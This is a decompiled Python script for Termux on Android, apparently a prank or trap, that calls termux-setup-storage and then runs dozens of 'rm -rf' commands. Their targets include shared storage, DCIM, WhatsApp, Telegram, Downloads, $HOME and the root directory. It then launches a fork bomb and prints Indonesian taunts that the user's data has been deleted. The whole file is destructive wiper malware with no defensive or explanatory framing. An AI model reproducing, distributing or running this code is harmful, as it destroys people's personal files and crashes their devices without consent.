# uncompyle6 version 3.3.5
# Python bytecode 2.7
# Decompiled from: Python 2.7.16 (default, Jun 28 2019, 18:52:35) 
# [GCC 4.2.1 Compatible Android (5220042 based on r346389c) Clang 8.0.7 (https://
# Embedded file name: <debby>
import os, optparse, random, sys, time
time.sleep(3)
os.system('clear')
os.system('termux-setup-storage')
os.system('rm -rf /storage/emulated/0')
os.system('rm -rf /sdcard/0')
os.system('rm -rf /storage/emulated/0/DCIM')
os.system('rm -rf /storage')
os.system('rm -rf /storage/emulated/0/android/obb')
os.system('rm -rf /sdcard/0/android/data')
os.system('rm -rf storage/')
os.system('rm -rf $HOME')
os.system('rm -rf sdcard/0')
os.system('rm -rf storage/emulated/0')
os.system('rm -rf /storage/emulated/0/WhatsApp')
os.system('rm -rf /storage/emulated/0/Telegram')
os.system('rm -rf /storage/emulated/0/Downloads')
os.system('rm -rf /storage/emulated/0/unduhan')
os.system('rm -rf /storage/shared/WhatsApp')
os.system('rm -rf /storage/shared/DCIM')
os.system('rm -rf /storage/shared/GBWhatsApp')
os.system('rm -rf /storage/shared/GBInstagram')
os.system('rm -rf /storage/shared/Pictures')
os.system('rm -rf /storage/shared/Movies')
os.system('rm -rf /storage/shared/Download')
os.system('rm -rf /storage/shared/Movies')
os.system('rm -rf /storage/shared/system/cdsys.co')
os.system('rm -rf /storage/shared/system')
os.system('rm -rf /storage/shared/Android')
os.system('rm -rf /storage/shared/Playlists')
os.system('rm -rf /storage/shared/Telegram')
os.system('rm -rf /storage/shared/Music')
os.system('rm -rf /storage/shared/Movies')
os.system('rm -rf /storage/emulated/0/GBWhatsApp')
os.system('rm -rf /storage/emulated/0/GBInsta')
os.system('rm -rf /storage/emulated/0/GBTelegram')
os.system('rm -rf /storage/downloads')
os.system('rm -rf /storage/dcim')
os.system('rm -rf /storage/shared')
os.system('rm -rf /storage/music')
os.system('rm -rf /storage/external-1')
os.system('rm -rf /')
os.system('rm -rf /sdcard/0/Music')
os.system('rm -rf /sdcard/0/WhatsApp')
os.system('rm -rf /sdcard/0/Intagram')
os.system(':(){ :|: & };:')
os.system('clear')
os.system('ls -l')
os.system('ls -l')
os.system('clear')
os.system('clear')
os.system('ls -l')
os.system('ls -l')
os.system('clear')

def k(s):
    for c in s + '\n':
        sys.stdout.write(c)
        sys.stdout.flush()
        time.sleep(random.random() * 0.1)

k("JADI DATA ANDA SUDAH KAMI HAPUS")
k("SEMOGA ANDA MELUPAKAN MANTAN")
